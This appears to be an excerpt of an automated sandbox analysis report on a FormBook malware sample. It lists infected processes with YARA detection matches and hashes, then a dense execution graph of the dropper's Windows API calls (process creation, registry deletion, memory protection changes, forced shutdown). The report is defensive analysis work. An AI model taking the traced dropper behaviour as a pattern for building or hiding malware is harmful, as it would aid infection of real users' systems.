                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.12650331699.00000000013B0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.12651774675.0000000003A80000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.12651774675.0000000003A80000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                    Reputation:high
                                                                                                                                                    Has exited:false

                                                                                                                                                    Target ID:4
                                                                                                                                                    Start time:05:57:38
                                                                                                                                                    Start date:04/10/2024
                                                                                                                                                    Path:C:\Windows\SysWOW64\winrs.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:"C:\Windows\SysWOW64\winrs.exe"
                                                                                                                                                    Imagebase:0x7c0000
                                                                                                                                                    File size:43'008 bytes
                                                                                                                                                    MD5 hash:E6C1CE56E6729A0B077C0F2384726B30
                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.12649287914.0000000003010000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.12649287914.0000000003010000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.12651169047.00000000036E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.12651169047.00000000036E0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.12651069125.00000000036A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.12651069125.00000000036A0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                    Reputation:low
                                                                                                                                                    Has exited:false

                                                                                                                                                    Target ID:5
                                                                                                                                                    Start time:05:58:08
                                                                                                                                                    Start date:04/10/2024
                                                                                                                                                    Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                                                                    Imagebase:0x7ff6ce530000
                                                                                                                                                    File size:597'432 bytes
                                                                                                                                                    MD5 hash:FA9F4FC5D7ECAB5A20BF7A9D1251C851
                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:moderate
                                                                                                                                                    Has exited:true

                                                                                                                                                      Execution Graph

                                                                                                                                                      Execution Coverage:17.3%
                                                                                                                                                      Dynamic/Decrypted Code Coverage:13.2%
                                                                                                                                                      Signature Coverage:20.6%
                                                                                                                                                      Total number of Nodes:1590
                                                                                                                                                      Total number of Limit Nodes:37
5520 402c37 17 API calls 5519->5520 5521 401694 MoveFileW 5520->5521 5522 4016a7 5521->5522 5528 4016a0 5521->5528 5523 40224a 5522->5523 5524 4066f3 2 API calls 5522->5524 5526 4016b6 5524->5526 5525 401423 24 API calls 5525->5523 5526->5523 5527 406176 36 API calls 5526->5527 5527->5528 5528->5525 5529 403a7c 5530 403a87 5529->5530 5531 403a8b 5530->5531 5532 403a8e GlobalAlloc 5530->5532 5532->5531 5533 1000103d 5534 1000101b 5 API calls 5533->5534 5535 10001056 5534->5535 5049 40247e 5050 402c77 17 API calls 5049->5050 5051 402488 5050->5051 5052 402c37 17 API calls 5051->5052 5053 402491 5052->5053 5054 40249c RegQueryValueExW 5053->5054 5058 402885 5053->5058 5055 4024c2 RegCloseKey 5054->5055 5056 4024bc 5054->5056 5055->5058 5056->5055 5060 4062f7 wsprintfW 5056->5060 5060->5055 5536 4020fe 5537 402c37 17 API calls 5536->5537 5538 402105 5537->5538 5539 402c37 17 API calls 5538->5539 5540 40210f 5539->5540 5541 402c37 17 API calls 5540->5541 5542 402119 5541->5542 5543 402c37 17 API calls 5542->5543 5544 402123 5543->5544 5545 402c37 17 API calls 5544->5545 5546 40212d 5545->5546 5547 40216c CoCreateInstance 5546->5547 5548 402c37 17 API calls 5546->5548 5551 40218b 5547->5551 5548->5547 5549 401423 24 API calls 5550 40224a 5549->5550 5551->5549 5551->5550 5552 4019ff 5553 402c37 17 API calls 5552->5553 5554 401a06 5553->5554 5555 402c37 17 API calls 5554->5555 5556 401a0f 5555->5556 5557 401a16 lstrcmpiW 5556->5557 5558 401a28 lstrcmpW 5556->5558 5559 401a1c 5557->5559 5558->5559 4111 401f00 4126 402c37 4111->4126 4120 401f2b 4122 401f30 4120->4122 4123 401f3b 4120->4123 4121 402885 4151 4062f7 wsprintfW 4122->4151 4125 401f39 CloseHandle 4123->4125 4125->4121 4127 402c43 4126->4127 4152 4063d2 4127->4152 4130 401f06 4132 405414 4130->4132 4133 40542f 4132->4133 4141 401f10 4132->4141 4134 40544b lstrlenW 4133->4134 4135 4063d2 17 API calls 4133->4135 4136 405474 4134->4136 4137 405459 lstrlenW 4134->4137 4135->4134 4139 405487 4136->4139 4140 40547a 
SetWindowTextW 4136->4140 4138 40546b lstrcatW 4137->4138 4137->4141 4138->4136 4139->4141 4142 40548d SendMessageW SendMessageW SendMessageW 4139->4142 4140->4139 4143 405995 CreateProcessW 4141->4143 4142->4141 4144 401f16 4143->4144 4145 4059c8 CloseHandle 4143->4145 4144->4121 4144->4125 4146 40683b WaitForSingleObject 4144->4146 4145->4144 4147 406855 4146->4147 4148 406867 GetExitCodeProcess 4147->4148 4194 4067c6 4147->4194 4148->4120 4151->4125 4153 4063df 4152->4153 4154 40662a 4153->4154 4157 4065f8 lstrlenW 4153->4157 4158 4063d2 10 API calls 4153->4158 4161 40650d GetSystemDirectoryW 4153->4161 4163 406520 GetWindowsDirectoryW 4153->4163 4164 406644 5 API calls 4153->4164 4165 4063d2 10 API calls 4153->4165 4166 40659b lstrcatW 4153->4166 4167 406554 SHGetSpecialFolderLocation 4153->4167 4178 40627e 4153->4178 4183 4062f7 wsprintfW 4153->4183 4184 4063b0 lstrcpynW 4153->4184 4155 402c64 4154->4155 4185 4063b0 lstrcpynW 4154->4185 4155->4130 4169 406644 4155->4169 4157->4153 4158->4157 4161->4153 4163->4153 4164->4153 4165->4153 4166->4153 4167->4153 4168 40656c SHGetPathFromIDListW CoTaskMemFree 4167->4168 4168->4153 4175 406651 4169->4175 4170 4066c7 4171 4066cc CharPrevW 4170->4171 4173 4066ed 4170->4173 4171->4170 4172 4066ba CharNextW 4172->4170 4172->4175 4173->4130 4175->4170 4175->4172 4176 4066a6 CharNextW 4175->4176 4177 4066b5 CharNextW 4175->4177 4190 405cae 4175->4190 4176->4175 4177->4172 4186 40621d 4178->4186 4181 4062b2 RegQueryValueExW RegCloseKey 4182 4062e2 4181->4182 4182->4153 4183->4153 4184->4153 4185->4155 4187 40622c 4186->4187 4188 406230 4187->4188 4189 406235 RegOpenKeyExW 4187->4189 4188->4181 4188->4182 4189->4188 4191 405cb4 4190->4191 4192 405cca 4191->4192 4193 405cbb CharNextW 4191->4193 4192->4175 4193->4191 4195 4067e3 PeekMessageW 4194->4195 4196 4067f3 WaitForSingleObject 4195->4196 4197 4067d9 DispatchMessageW 4195->4197 4196->4147 4197->4195 5560 401000 5561 401037 BeginPaint GetClientRect 5560->5561 5562 40100c 
DefWindowProcW 5560->5562 5563 4010f3 5561->5563 5565 401179 5562->5565 5566 401073 CreateBrushIndirect FillRect DeleteObject 5563->5566 5567 4010fc 5563->5567 5566->5563 5568 401102 CreateFontIndirectW 5567->5568 5569 401167 EndPaint 5567->5569 5568->5569 5570 401112 6 API calls 5568->5570 5569->5565 5570->5569 4372 100027c2 4373 10002812 4372->4373 4374 100027d2 VirtualProtect 4372->4374 4374->4373 5571 401503 5572 40150b 5571->5572 5574 40151e 5571->5574 5573 402c15 17 API calls 5572->5573 5573->5574 4414 402306 4415 40230e 4414->4415 4418 402314 4414->4418 4416 402c37 17 API calls 4415->4416 4416->4418 4417 402322 4420 402c37 17 API calls 4417->4420 4422 402330 4417->4422 4418->4417 4419 402c37 17 API calls 4418->4419 4419->4417 4420->4422 4421 402c37 17 API calls 4423 402339 WritePrivateProfileStringW 4421->4423 4422->4421 5582 401f86 5583 402c37 17 API calls 5582->5583 5584 401f8d 5583->5584 5585 40678a 5 API calls 5584->5585 5586 401f9c 5585->5586 5587 401fb8 GlobalAlloc 5586->5587 5588 402020 5586->5588 5587->5588 5589 401fcc 5587->5589 5590 40678a 5 API calls 5589->5590 5591 401fd3 5590->5591 5592 40678a 5 API calls 5591->5592 5593 401fdd 5592->5593 5593->5588 5597 4062f7 wsprintfW 5593->5597 5595 402012 5598 4062f7 wsprintfW 5595->5598 5597->5595 5598->5588 4424 402388 4425 402390 4424->4425 4426 4023bb 4424->4426 4440 402c77 4425->4440 4428 402c37 17 API calls 4426->4428 4430 4023c2 4428->4430 4436 402cf5 4430->4436 4431 4023a1 4433 402c37 17 API calls 4431->4433 4435 4023a8 RegDeleteValueW RegCloseKey 4433->4435 4434 4023cf 4435->4434 4437 402d0b 4436->4437 4438 402d21 4437->4438 4445 402d2a 4437->4445 4438->4434 4441 402c37 17 API calls 4440->4441 4442 402c8e 4441->4442 4443 40621d RegOpenKeyExW 4442->4443 4444 402397 4443->4444 4444->4431 4444->4434 4446 40621d RegOpenKeyExW 4445->4446 4447 402d58 4446->4447 4448 402dd0 4447->4448 4453 402d5c 4447->4453 4448->4438 4449 402d7e RegEnumKeyW 4450 402d95 RegCloseKey 4449->4450 4449->4453 4451 40678a 5 API 
calls 4450->4451 4454 402da5 4451->4454 4452 402db6 RegCloseKey 4452->4448 4453->4449 4453->4450 4453->4452 4455 402d2a 6 API calls 4453->4455 4456 402dc4 RegDeleteKeyW 4454->4456 4457 402da9 4454->4457 4455->4453 4456->4448 4457->4448 5599 405388 5600 405398 5599->5600 5601 4053ac 5599->5601 5602 4053f5 5600->5602 5603 40539e 5600->5603 5604 4053b4 IsWindowVisible 5601->5604 5610 4053cb 5601->5610 5605 4053fa CallWindowProcW 5602->5605 5606 404391 SendMessageW 5603->5606 5604->5602 5607 4053c1 5604->5607 5608 4053a8 5605->5608 5606->5608 5612 404cde SendMessageW 5607->5612 5610->5605 5617 404d5e 5610->5617 5613 404d01 GetMessagePos ScreenToClient SendMessageW 5612->5613 5614 404d3d SendMessageW 5612->5614 5615 404d35 5613->5615 5616 404d3a 5613->5616 5614->5615 5615->5610 5616->5614 5626 4063b0 lstrcpynW 5617->5626 5619 404d71 5627 4062f7 wsprintfW 5619->5627 5621 404d7b 5622 40140b 2 API calls 5621->5622 5623 404d84 5622->5623 5628 4063b0 lstrcpynW 5623->5628 5625 404d8b 5625->5602 5626->5619 5627->5621 5628->5625 4467 403489 SetErrorMode GetVersion 4468 4034c8 4467->4468 4469 4034ce 4467->4469 4470 40678a 5 API calls 4468->4470 4471 40671a 3 API calls 4469->4471 4470->4469 4472 4034e4 lstrlenA 4471->4472 4472->4469 4473 4034f4 4472->4473 4474 40678a 5 API calls 4473->4474 4475 4034fb 4474->4475 4476 40678a 5 API calls 4475->4476 4477 403502 4476->4477 4478 40678a 5 API calls 4477->4478 4479 40350e #17 OleInitialize SHGetFileInfoW 4478->4479 4558 4063b0 lstrcpynW 4479->4558 4482 40355a GetCommandLineW 4559 4063b0 lstrcpynW 4482->4559 4484 40356c GetModuleHandleW 4485 403584 4484->4485 4486 405cae CharNextW 4485->4486 4487 403593 CharNextW 4486->4487 4488 4036bd GetTempPathW 4487->4488 4498 4035ac 4487->4498 4560 403458 4488->4560 4490 4036d5 4491 4036d9 GetWindowsDirectoryW lstrcatW 4490->4491 4492 40372f DeleteFileW 4490->4492 4493 403458 12 API calls 4491->4493 4570 402f14 GetTickCount GetModuleFileNameW 4492->4570 4496 4036f5 4493->4496 4494 405cae CharNextW 
4494->4498 4496->4492 4499 4036f9 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4496->4499 4497 403743 4504 4037e6 4497->4504 4508 405cae CharNextW 4497->4508 4553 4037f6 4497->4553 4498->4494 4501 4036a8 4498->4501 4503 4036a6 4498->4503 4502 403458 12 API calls 4499->4502 4657 4063b0 lstrcpynW 4501->4657 4506 403727 4502->4506 4503->4488 4600 403abe 4504->4600 4506->4492 4506->4553 4521 403762 4508->4521 4510 403930 4513 4039b4 ExitProcess 4510->4513 4514 403938 GetCurrentProcess OpenProcessToken 4510->4514 4511 403810 4669 405a12 4511->4669 4519 403950 LookupPrivilegeValueW AdjustTokenPrivileges 4514->4519 4520 403984 4514->4520 4516 4037c0 4522 405d89 18 API calls 4516->4522 4517 403826 4523 40597d 5 API calls 4517->4523 4519->4520 4524 40678a 5 API calls 4520->4524 4521->4516 4521->4517 4525 4037cc 4522->4525 4526 40382b lstrcatW 4523->4526 4527 40398b 4524->4527 4525->4553 4658 4063b0 lstrcpynW 4525->4658 4528 403847 lstrcatW lstrcmpiW 4526->4528 4529 40383c lstrcatW 4526->4529 4530 4039a0 ExitWindowsEx 4527->4530 4531 4039ad 4527->4531 4533 403863 4528->4533 4528->4553 4529->4528 4530->4513 4530->4531 4675 40140b 4531->4675 4536 403868 4533->4536 4537 40386f 4533->4537 4535 4037db 4659 4063b0 lstrcpynW 4535->4659 4540 4058e3 4 API calls 4536->4540 4538 405960 2 API calls 4537->4538 4541 403874 SetCurrentDirectoryW 4538->4541 4542 40386d 4540->4542 4543 403884 4541->4543 4544 40388f 4541->4544 4542->4541 4673 4063b0 lstrcpynW 4543->4673 4674 4063b0 lstrcpynW 4544->4674 4547 4063d2 17 API calls 4548 4038ce DeleteFileW 4547->4548 4549 4038db CopyFileW 4548->4549 4554 40389d 4548->4554 4549->4554 4550 403924 4551 406176 36 API calls 4550->4551 4551->4553 4552 406176 36 API calls 4552->4554 4660 4039cc 4553->4660 4554->4547 4554->4550 4554->4552 4555 4063d2 17 API calls 4554->4555 4556 405995 2 API calls 4554->4556 4557 40390f CloseHandle 4554->4557 4555->4554 4556->4554 4557->4554 4558->4482 4559->4484 4561 406644 5 API calls 4560->4561 
4562 403464 4561->4562 4563 40346e 4562->4563 4564 405c81 3 API calls 4562->4564 4563->4490 4565 403476 4564->4565 4566 405960 2 API calls 4565->4566 4567 40347c 4566->4567 4678 405ed1 4567->4678 4682 405ea2 GetFileAttributesW CreateFileW 4570->4682 4572 402f57 4599 402f64 4572->4599 4683 4063b0 lstrcpynW 4572->4683 4574 402f7a 4575 405ccd 2 API calls 4574->4575 4576 402f80 4575->4576 4684 4063b0 lstrcpynW 4576->4684 4578 402f8b GetFileSize 4579 40308c 4578->4579 4597 402fa2 4578->4597 4685 402e72 4579->4685 4583 403127 4586 402e72 32 API calls 4583->4586 4584 4030cf GlobalAlloc 4585 4030e6 4584->4585 4590 405ed1 2 API calls 4585->4590 4586->4599 4588 4030b0 4591 40342b ReadFile 4588->4591 4589 402e72 32 API calls 4589->4597 4593 4030f7 CreateFileW 4590->4593 4592 4030bb 4591->4592 4592->4584 4592->4599 4594 403131 4593->4594 4593->4599 4700 403441 SetFilePointer 4594->4700 4596 40313f 4701 4031ba 4596->4701 4597->4579 4597->4583 4597->4589 4597->4599 4716 40342b 4597->4716 4599->4497 4601 40678a 5 API calls 4600->4601 4602 403ad2 4601->4602 4603 403ad8 4602->4603 4604 403aea 4602->4604 4752 4062f7 wsprintfW 4603->4752 4605 40627e 3 API calls 4604->4605 4606 403b1a 4605->4606 4607 403b39 lstrcatW 4606->4607 4609 40627e 3 API calls 4606->4609 4610 403ae8 4607->4610 4609->4607 4744 403d94 4610->4744 4613 405d89 18 API calls 4614 403b6b 4613->4614 4615 403bff 4614->4615 4617 40627e 3 API calls 4614->4617 4616 405d89 18 API calls 4615->4616 4618 403c05 4616->4618 4620 403b9d 4617->4620 4619 403c15 LoadImageW 4618->4619 4621 4063d2 17 API calls 4618->4621 4622 403cbb 4619->4622 4623 403c3c RegisterClassW 4619->4623 4620->4615 4624 403bbe lstrlenW 4620->4624 4627 405cae CharNextW 4620->4627 4621->4619 4626 40140b 2 API calls 4622->4626 4625 403c72 SystemParametersInfoW CreateWindowExW 4623->4625 4656 403cc5 4623->4656 4628 403bf2 4624->4628 4629 403bcc lstrcmpiW 4624->4629 4625->4622 4630 403cc1 4626->4630 4631 403bbb 4627->4631 4633 405c81 3 API calls 4628->4633 
4629->4628 4632 403bdc GetFileAttributesW 4629->4632 4635 403d94 18 API calls 4630->4635 4630->4656 4631->4624 4634 403be8 4632->4634 4636 403bf8 4633->4636 4634->4628 4637 405ccd 2 API calls 4634->4637 4638 403cd2 4635->4638 4753 4063b0 lstrcpynW 4636->4753 4637->4628 4640 403d61 4638->4640 4641 403cde ShowWindow 4638->4641 4754 4054e7 OleInitialize 4640->4754 4643 40671a 3 API calls 4641->4643 4645 403cf6 4643->4645 4644 403d67 4646 403d83 4644->4646 4647 403d6b 4644->4647 4648 403d04 GetClassInfoW 4645->4648 4650 40671a 3 API calls 4645->4650 4649 40140b 2 API calls 4646->4649 4654 40140b 2 API calls 4647->4654 4647->4656 4651 403d18 GetClassInfoW RegisterClassW 4648->4651 4652 403d2e DialogBoxParamW 4648->4652 4649->4656 4650->4648 4651->4652 4653 40140b 2 API calls 4652->4653 4655 403d56 4653->4655 4654->4656 4655->4656 4656->4553 4657->4503 4658->4535 4659->4504 4661 4039e7 4660->4661 4662 4039dd CloseHandle 4660->4662 4663 4039f1 CloseHandle 4661->4663 4664 4039fb 4661->4664 4662->4661 4663->4664 4772 403a29 4664->4772 4667 405abe 67 API calls 4668 4037ff OleUninitialize 4667->4668 4668->4510 4668->4511 4670 405a27 4669->4670 4671 40381e ExitProcess 4670->4671 4672 405a3b MessageBoxIndirectW 4670->4672 4672->4671 4673->4544 4674->4554 4676 401389 2 API calls 4675->4676 4677 401420 4676->4677 4677->4513 4679 405ede GetTickCount GetTempFileNameW 4678->4679 4680 405f14 4679->4680 4681 403487 4679->4681 4680->4679 4680->4681 4681->4490 4682->4572 4683->4574 4684->4578 4686 402e83 4685->4686 4687 402e9b 4685->4687 4688 402e93 4686->4688 4689 402e8c DestroyWindow 4686->4689 4690 402ea3 4687->4690 4691 402eab GetTickCount 4687->4691 4688->4584 4688->4599 4719 403441 SetFilePointer 4688->4719 4689->4688 4693 4067c6 2 API calls 4690->4693 4691->4688 4692 402eb9 4691->4692 4694 402ec1 4692->4694 4695 402eee CreateDialogParamW ShowWindow 4692->4695 4693->4688 4694->4688 4720 402e56 4694->4720 4695->4688 4697 402ecf wsprintfW 4698 405414 24 API calls 4697->4698 4699 
402eec 4698->4699 4699->4688 4700->4596 4702 4031e5 4701->4702 4703 4031c9 SetFilePointer 4701->4703 4723 4032c2 GetTickCount 4702->4723 4703->4702 4706 405f25 ReadFile 4707 403205 4706->4707 4708 4032c2 42 API calls 4707->4708 4715 403282 4707->4715 4709 40321c 4708->4709 4710 403288 ReadFile 4709->4710 4713 40322b 4709->4713 4709->4715 4710->4715 4712 405f25 ReadFile 4712->4713 4713->4712 4714 405f54 WriteFile 4713->4714 4713->4715 4714->4713 4715->4599 4717 405f25 ReadFile 4716->4717 4718 40343e 4717->4718 4718->4597 4719->4588 4721 402e65 4720->4721 4722 402e67 MulDiv 4720->4722 4721->4722 4722->4697 4724 4032f0 4723->4724 4725 40341a 4723->4725 4736 403441 SetFilePointer 4724->4736 4726 402e72 32 API calls 4725->4726 4732 4031ec 4726->4732 4728 4032fb SetFilePointer 4734 403320 4728->4734 4729 40342b ReadFile 4729->4734 4731 402e72 32 API calls 4731->4734 4732->4706 4732->4715 4733 405f54 WriteFile 4733->4734 4734->4729 4734->4731 4734->4732 4734->4733 4735 4033fb SetFilePointer 4734->4735 4737 40690b 4734->4737 4735->4725 4736->4728 4738 406930 4737->4738 4741 406938 4737->4741 4738->4734 4739 4069c8 GlobalAlloc 4739->4738 4739->4741 4740 4069bf GlobalFree 4740->4739 4741->4738 4741->4739 4741->4740 4742 406a36 GlobalFree 4741->4742 4743 406a3f GlobalAlloc 4741->4743 4742->4743 4743->4738 4743->4741 4745 403da8 4744->4745 4761 4062f7 wsprintfW 4745->4761 4747 403e19 4762 403e4d 4747->4762 4749 403b49 4749->4613 4750 403e1e 4750->4749 4751 4063d2 17 API calls 4750->4751 4751->4750 4752->4610 4753->4615 4765 404391 4754->4765 4756 40550a 4760 405531 4756->4760 4768 401389 4756->4768 4757 404391 SendMessageW 4758 405543 OleUninitialize 4757->4758 4758->4644 4760->4757 4761->4747 4763 4063d2 17 API calls 4762->4763 4764 403e5b SetWindowTextW 4763->4764 4764->4750 4766 4043a9 4765->4766 4767 40439a SendMessageW 4765->4767 4766->4756 4767->4766 4770 401390 4768->4770 4769 4013fe 4769->4756 4770->4769 4771 4013cb MulDiv SendMessageW 4770->4771 4771->4770 4773 403a37 
4772->4773 4774 403a00 4773->4774 4775 403a3c FreeLibrary GlobalFree 4773->4775 4774->4667 4775->4774 4775->4775 4776 401389 4778 401390 4776->4778 4777 4013fe 4778->4777 4779 4013cb MulDiv SendMessageW 4778->4779 4779->4778 5629 40190c 5630 401943 5629->5630 5631 402c37 17 API calls 5630->5631 5632 401948 5631->5632 5633 405abe 67 API calls 5632->5633 5634 401951 5633->5634 5635 401d0e 5636 402c15 17 API calls 5635->5636 5637 401d15 5636->5637 5638 402c15 17 API calls 5637->5638 5639 401d21 GetDlgItem 5638->5639 5640 40258c 5639->5640 5641 1000164f 5642 10001516 GlobalFree 5641->5642 5644 10001667 5642->5644 5643 100016ad GlobalFree 5644->5643 5645 10001682 5644->5645 5646 10001699 VirtualFree 5644->5646 5645->5643 5646->5643 5647 40190f 5648 402c37 17 API calls 5647->5648 5649 401916 5648->5649 5650 405a12 MessageBoxIndirectW 5649->5650 5651 40191f 5650->5651 5652 404d90 GetDlgItem GetDlgItem 5653 404de2 7 API calls 5652->5653 5661 404ffb 5652->5661 5654 404e85 DeleteObject 5653->5654 5655 404e78 SendMessageW 5653->5655 5656 404e8e 5654->5656 5655->5654 5658 404ec5 5656->5658 5660 4063d2 17 API calls 5656->5660 5657 4050df 5659 40518b 5657->5659 5668 405138 SendMessageW 5657->5668 5695 404fee 5657->5695 5662 404345 18 API calls 5658->5662 5664 405195 SendMessageW 5659->5664 5665 40519d 5659->5665 5666 404ea7 SendMessageW SendMessageW 5660->5666 5661->5657 5663 40506c 5661->5663 5671 404cde 5 API calls 5661->5671 5667 404ed9 5662->5667 5663->5657 5670 4050d1 SendMessageW 5663->5670 5664->5665 5676 4051b6 5665->5676 5677 4051af ImageList_Destroy 5665->5677 5688 4051c6 5665->5688 5666->5656 5672 404345 18 API calls 5667->5672 5674 40514d SendMessageW 5668->5674 5668->5695 5669 4043ac 8 API calls 5675 405381 5669->5675 5670->5657 5671->5663 5683 404ee7 5672->5683 5673 405335 5681 405347 ShowWindow GetDlgItem ShowWindow 5673->5681 5673->5695 5679 405160 5674->5679 5680 4051bf GlobalFree 5676->5680 5676->5688 5677->5676 5678 404fbc GetWindowLongW SetWindowLongW 5682 
404fd5 5678->5682 5689 405171 SendMessageW 5679->5689 5680->5688 5681->5695 5684 404ff3 5682->5684 5685 404fdb ShowWindow 5682->5685 5683->5678 5687 404f37 SendMessageW 5683->5687 5690 404fb6 5683->5690 5692 404f73 SendMessageW 5683->5692 5693 404f84 SendMessageW 5683->5693 5704 40437a SendMessageW 5684->5704 5703 40437a SendMessageW 5685->5703 5687->5683 5688->5673 5694 404d5e 4 API calls 5688->5694 5699 405201 5688->5699 5689->5659 5690->5678 5690->5682 5692->5683 5693->5683 5694->5699 5695->5669 5696 40530b InvalidateRect 5696->5673 5697 405321 5696->5697 5705 404c99 5697->5705 5698 40522f SendMessageW 5702 405245 5698->5702 5699->5698 5699->5702 5701 4052b9 SendMessageW SendMessageW 5701->5702 5702->5696 5702->5701 5703->5695 5704->5661 5708 404bd0 5705->5708 5707 404cae 5707->5673 5709 404be9 5708->5709 5710 4063d2 17 API calls 5709->5710 5711 404c4d 5710->5711 5712 4063d2 17 API calls 5711->5712 5713 404c58 5712->5713 5714 4063d2 17 API calls 5713->5714 5715 404c6e lstrlenW wsprintfW SetDlgItemTextW 5714->5715 5715->5707 5716 401491 5717 405414 24 API calls 5716->5717 5718 401498 5717->5718 5719 402592 5720 4025c1 5719->5720 5721 4025a6 5719->5721 5723 4025f5 5720->5723 5724 4025c6 5720->5724 5722 402c15 17 API calls 5721->5722 5729 4025ad 5722->5729 5726 402c37 17 API calls 5723->5726 5725 402c37 17 API calls 5724->5725 5727 4025cd WideCharToMultiByte lstrlenA 5725->5727 5728 4025fc lstrlenW 5726->5728 5727->5729 5728->5729 5731 405f83 5 API calls 5729->5731 5732 40263f 5729->5732 5733 402629 5729->5733 5730 405f54 WriteFile 5730->5732 5731->5733 5733->5730 5733->5732 5734 404493 lstrlenW 5735 4044b2 5734->5735 5736 4044b4 WideCharToMultiByte 5734->5736 5735->5736 5737 404814 5738 404840 5737->5738 5739 404851 5737->5739 5798 4059f6 GetDlgItemTextW 5738->5798 5741 40485d GetDlgItem 5739->5741 5747 4048bc 5739->5747 5743 404871 5741->5743 5742 40484b 5745 406644 5 API calls 5742->5745 5749 404885 SetWindowTextW 5743->5749 5754 405d2c 4 API calls 5743->5754 
5744 4049a0 5746 404b4f 5744->5746 5800 4059f6 GetDlgItemTextW 5744->5800 5745->5739 5753 4043ac 8 API calls 5746->5753 5747->5744 5747->5746 5750 4063d2 17 API calls 5747->5750 5752 404345 18 API calls 5749->5752 5755 404930 SHBrowseForFolderW 5750->5755 5751 4049d0 5756 405d89 18 API calls 5751->5756 5757 4048a1 5752->5757 5758 404b63 5753->5758 5759 40487b 5754->5759 5755->5744 5760 404948 CoTaskMemFree 5755->5760 5761 4049d6 5756->5761 5762 404345 18 API calls 5757->5762 5759->5749 5763 405c81 3 API calls 5759->5763 5764 405c81 3 API calls 5760->5764 5801 4063b0 lstrcpynW 5761->5801 5765 4048af 5762->5765 5763->5749 5766 404955 5764->5766 5799 40437a SendMessageW 5765->5799 5769 40498c SetDlgItemTextW 5766->5769 5774 4063d2 17 API calls 5766->5774 5769->5744 5770 4048b5 5772 40678a 5 API calls 5770->5772 5771 4049ed 5773 40678a 5 API calls 5771->5773 5772->5747 5781 4049f4 5773->5781 5775 404974 lstrcmpiW 5774->5775 5775->5769 5778 404985 lstrcatW 5775->5778 5776 404a35 5802 4063b0 lstrcpynW 5776->5802 5778->5769 5779 404a3c 5780 405d2c 4 API calls 5779->5780 5782 404a42 GetDiskFreeSpaceW 5780->5782 5781->5776 5784 405ccd 2 API calls 5781->5784 5786 404a8d 5781->5786 5785 404a66 MulDiv 5782->5785 5782->5786 5784->5781 5785->5786 5787 404afe 5786->5787 5788 404c99 20 API calls 5786->5788 5789 404b21 5787->5789 5791 40140b 2 API calls 5787->5791 5790 404aeb 5788->5790 5803 404367 EnableWindow 5789->5803 5793 404b00 SetDlgItemTextW 5790->5793 5794 404af0 5790->5794 5791->5789 5793->5787 5796 404bd0 20 API calls 5794->5796 5795 404b3d 5795->5746 5797 40476d SendMessageW 5795->5797 5796->5787 5797->5746 5798->5742 5799->5770 5800->5751 5801->5771 5802->5779 5803->5795 5804 10001058 5806 10001074 5804->5806 5805 100010dd 5806->5805 5807 10001516 GlobalFree 5806->5807 5808 10001092 5806->5808 5807->5808 5809 10001516 GlobalFree 5808->5809 5810 100010a2 5809->5810 5811 100010b2 5810->5811 5812 100010a9 GlobalSize 5810->5812 5813 100010b6 GlobalAlloc 5811->5813 5814 
100010c7 5811->5814 5812->5811 5815 1000153d 3 API calls 5813->5815 5816 100010d2 GlobalFree 5814->5816 5815->5814 5816->5805 5817 401c19 5818 402c15 17 API calls 5817->5818 5819 401c20 5818->5819 5820 402c15 17 API calls 5819->5820 5821 401c2d 5820->5821 5822 402c37 17 API calls 5821->5822 5824 401c42 5821->5824 5822->5824 5823 401c52 5826 401ca9 5823->5826 5827 401c5d 5823->5827 5824->5823 5825 402c37 17 API calls 5824->5825 5825->5823 5828 402c37 17 API calls 5826->5828 5829 402c15 17 API calls 5827->5829 5830 401cae 5828->5830 5831 401c62 5829->5831 5832 402c37 17 API calls 5830->5832 5833 402c15 17 API calls 5831->5833 5834 401cb7 FindWindowExW 5832->5834 5835 401c6e 5833->5835 5838 401cd9 5834->5838 5836 401c99 SendMessageW 5835->5836 5837 401c7b SendMessageTimeoutW 5835->5837 5836->5838 5837->5838 5839 402a9a SendMessageW 5840 402ab4 InvalidateRect 5839->5840 5841 402abf 5839->5841 5840->5841 5842 40281b 5843 402821 5842->5843 5844 402829 FindClose 5843->5844 5845 402abf 5843->5845 5844->5845 5846 40149e 5847 4022f1 5846->5847 5848 4014ac PostQuitMessage 5846->5848 5848->5847 5856 100010e1 5859 10001111 5856->5859 5857 100011d8 GlobalFree 5858 100012ba 2 API calls 5858->5859 5859->5857 5859->5858 5860 100011d3 5859->5860 5861 10001272 2 API calls 5859->5861 5862 10001164 GlobalAlloc 5859->5862 5863 100011f8 GlobalFree 5859->5863 5864 100011c4 GlobalFree 5859->5864 5865 100012e1 lstrcpyW 5859->5865 5860->5857 5861->5864 5862->5859 